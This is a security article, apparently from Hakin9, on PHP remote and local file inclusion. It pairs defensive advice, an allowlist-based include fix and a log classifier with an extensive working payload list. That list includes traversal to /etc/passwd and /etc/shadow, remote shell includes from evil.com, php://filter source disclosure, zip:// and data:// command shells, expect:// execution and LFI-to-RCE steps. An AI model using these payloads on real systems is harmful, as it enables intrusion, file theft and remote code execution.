RFI/LFI Payload List


As with many exploits, remote and local file inclusion (RFI/LFI) is a problem created at coding time, and it takes a second person to take advantage of it. This article should give you an idea of how to defend your website, and most importantly your code, against file inclusion. The code examples are in PHP.

Let's look at some of the code that makes RFI / LFI exploits possible.

Files

Obviously this should never be used. The $page input is not sanitized at all: whatever the browser sends in $page is passed straight to include(), which is a big "NO". Always validate any input that arrives from the browser. When the user clicks on "Files" to go to "files.php", the request looks like this:

http://localhost/index.php?page=files.php

If nobody has validated the input in the $page variable, we can point it at whatever we want. On a Unix/Linux host, for example, we can read the password file or configuration files (and the shadow file too, if the web server runs with enough privilege) through the unsanitized variable.

Reading files on the server like this is a "Local File Inclusion" or LFI exploit. On its own it is less severe than an RFI exploit, although the techniques at the end of this list show how an LFI can still be turned into code execution.

http://localhost/index.php?page=../../../../../../etc/passwd

The code will most likely return the contents of /etc/passwd. Now let's look at the RFI part of this exploit, using the same code as before.

Files

Now suppose we request something like ...

http://localhost/index.php?page=http://google.com/

Where the $page variable was originally used in the page, we now get the google.com homepage rendered instead. This is where the coder gets hurt. We all know what a c99 shell can do, and if coders are not careful it can be included into the site, letting anyone browse sensitive files and run commands whenever they like. Let's look at something simpler that can happen on a web page: the quick and dirty use of an RFI exploit. Create a file named "test.php", put the following code in it, and save it.




This file is what you include on the site through the RFI exploit. The passthru() function in PHP is very dangerous, and many hosts disable it "for security reasons". With this code in test.php, we can send a request to the website that pulls the file in through the file inclusion bug:

http://localhost/index.php?page=http://someevilhost.com/test.php

Since the code reads its command from $_GET, we need to supply a command to pass to passthru(). We can do something like this:

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

The Unix machine then outputs /etc/passwd through the cat command. Two practical notes on this: the included code runs in the victim's PHP interpreter, so $_GET['cmd'] has to be a parameter of the request to the vulnerable site itself (…index.php?page=http://someevilhost.com/test.txt&cmd=cat%20/etc/passwd), and the attacker's server must serve the payload as plain text (a .txt file, for instance), otherwise the attacker's own host executes passthru() and the victim only includes its output. Now that we know how the RFI exploit works, we need to know how to prevent it: how to make it impossible for anyone to run commands and include remote pages on your server. First, we can disable passthru(). But anything else on your site can do the same through system(), exec() or shell_exec(), and a remote include does not even need passthru() to do damage, so that is not the only thing you should do. Keep allow_url_include set to Off in php.ini (it is Off by default), which removes the remote part of the attack outright, and validate your inputs as I said before. Instead of passing variables straight into include(), use PHP's own string functions. For a start, chop() was adapted from Perl into PHP; it is an alias of rtrim() and removes trailing whitespace from a string (not from an array). We can use it like this:

 Files 

There are many functions that can clean up a string: htmlspecialchars(), htmlentities(), stripslashes() and more. Be aware, though, that these are output-encoding and escaping functions: they do nothing about a "../" sequence or an "http://" prefix, so on their own they do not stop file inclusion. When in doubt I prefer to use my own functions. We can write a PHP function that cleans everything for you; here I have prepared something quick and easy along those lines.


I hope you can see what is going on inside this function, so you can add your own checks. I would suggest using str_replace(), and there are plenty of other functions to clean with. Keep in mind that simply stripping "../" is bypassable (the "....//" trick in the payload list below survives a single pass of str_replace), so the reliable approach is not to clean the path at all but to accept only names from a fixed list of pages. Be thoughtful and stop the RFI & LFI exploit frenzy!
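The article's own code snippets did not survive in this copy, so here is an added example (not the original author's code) of the vulnerable pattern described above next to a hardened replacement. It assumes a pages/ directory beside the script and three known page names; both are placeholders.

```php
<?php
// Added example, not from the original article.
// Vulnerable pattern the article describes: the `page` parameter goes
// straight into include(). Shown only to contrast with the fix below.
function include_page_vulnerable(): void
{
    $page = $_GET['page'];   // e.g. ../../etc/passwd, php://filter/..., http://evil/
    include $page;
}

// Hardened replacement. The user-supplied value is only ever used as a key
// into an allowlist; the actual path is built by us and then verified to
// canonicalise inside PAGE_DIR. Nothing is "cleaned" with str_replace().
const PAGE_DIR      = __DIR__ . '/pages';            // assumption: pages live here
const ALLOWED_PAGES = ['home', 'files', 'contact'];  // assumption: these files exist

function resolve_page(string $requested): ?string
{
    // 1. Allowlist with strict comparison (no type juggling, no partial match).
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: realpath() resolves symlinks and "..", so even a
    //    bad allowlist entry cannot escape the page directory.
    $base      = realpath(PAGE_DIR);
    $candidate = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function include_page_hardened(): void
{
    $requested = (string) ($_GET['page'] ?? 'home');
    $path      = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;   // always a path we built, never user input
}

include_page_hardened();
```

With the allowlist in place, every payload in the list below (traversal, %00, double encoding, php://, zip://, data:, expect://, http://) fails at step 1 because none of them is one of the three names. Pair this with allow_url_include=Off and, where possible, open_basedir in php.ini.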

Basic LFI (null byte, double encoding, and other tricks). Note that the %00 truncation only works on PHP older than 5.3.4; the others depend on how the application decodes and filters the parameter:

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting files to check out:

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the file descriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI (null byte, double encoding, and other tricks). Remote includes require allow_url_include=On on the target, which is Off by default:

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers:

LFI Wrapper rot13 and base64: php://filter (the wrapper name is case insensitive). Reading a .php file through a filter returns its source encoded instead of executing it, which is how source code is disclosed:

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper:
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

LFI Wrapper ZIP:

# The PHP payload body is missing from this copy; a minimal command shell
# like the one in the data:// example below is assumed here.
echo '<?php system($_GET["cmd"]); ?>' > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload (the base64 below decodes to exactly that; data: URLs are treated as remote and need allow_url_include=On):

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

RFI Wrapper EXPECT (requires the PECL expect extension, which is rarely installed):

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

XSS via RFI/LFI with "<svg onload=alert(1)>" payload (the base64 below decodes to that markup):

http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via /proc/*/fd:

  1. Upload a lot of shells (for example: 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the file descriptor (can be bruteforced too)

LFI to RCE via Upload:

http://example.com/index.php?page=path/to/uploaded/file.png
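From the defender's side, the payload list above is also a catalogue of what to look for in access logs or a WAF. The following is an added example (not part of the original article) that tags a raw `page` parameter value with the LFI/RFI trick it uses: traversal, null byte, double encoding, PHP wrapper, remote URL or sensitive system path. The sample values are constructed from the list on this page; the function name and the tag names are my own.

```php
<?php
// Added example, not from the original article: classify a raw `page`
// parameter (as it appears in a log line or WAF event) by the LFI/RFI
// technique it uses. Returns an array of tags; empty means nothing seen.
function classify_page_param(string $raw): array
{
    $tags  = [];
    $once  = rawurldecode($raw);   // what the web server hands to PHP
    $twice = rawurldecode($once);  // what a second decode (e.g. in app code) yields

    // %252e%252e%252f only becomes "../" after two decodes.
    if ($once !== $twice) {
        $tags[] = 'double-encoding';
    }
    $v = $twice;

    // %00 truncation (only effective on PHP < 5.3.4, but still worth flagging).
    if (strpos($v, "\0") !== false) {
        $tags[] = 'null-byte';
    }

    // "../" or "..\" anywhere, which also catches the "....//" trick
    // because stripping one "../" from it leaves another.
    if (preg_match('#\.\.[/\\\\]#', $v)) {
        $tags[] = 'traversal';
    }

    // A scheme prefix: http/https/ftp mean a remote include, anything else
    // (php, zip, data, expect, phar, ...) is a PHP stream wrapper.
    if (preg_match('#^([a-z][a-z0-9+.-]*):#i', $v, $m)) {
        $scheme = strtolower($m[1]);
        $tags[] = in_array($scheme, ['http', 'https', 'ftp'], true)
            ? 'remote-include'
            : 'wrapper:' . $scheme;
    }

    // Direct reads of /etc or /proc, with or without a leading slash.
    if (preg_match('#(^|/)(etc|proc)/#', $v)) {
        $tags[] = 'sensitive-path';
    }
    return $tags;
}

// Constructed sample values taken from the payload list above.
$samples = [
    'files.php',
    '../../etc/passwd',
    'etc/passwd%00',
    '%252e%252e%252f',
    '....//....//etc/passwd',
    'http://evil.com/shell.txt',
    'pHp://FilTer/convert.base64-encode/resource=index.php',
    'zip://shell.jpg%23payload.php',
    'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=',
    'php:expect://id',
    '/proc/self/environ',
];

foreach ($samples as $s) {
    $tags = classify_page_param($s);
    printf("%-70s %s\n", $s, $tags ? implode(',', $tags) : 'clean');
}
```

Only the first sample comes back clean; "%252e%252e%252f" is tagged both double-encoding and traversal because the check runs on the fully decoded value, and the mixed-case pHp://FilTer value is still recognised as wrapper:php because the scheme is lowercased before comparison. In a real deployment this is a triage aid, not a block list: the allowlist on the include itself is what actually closes the hole.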


The post RFI/LFI Payload List appeared first on Hakin9 – IT Security Magazine.
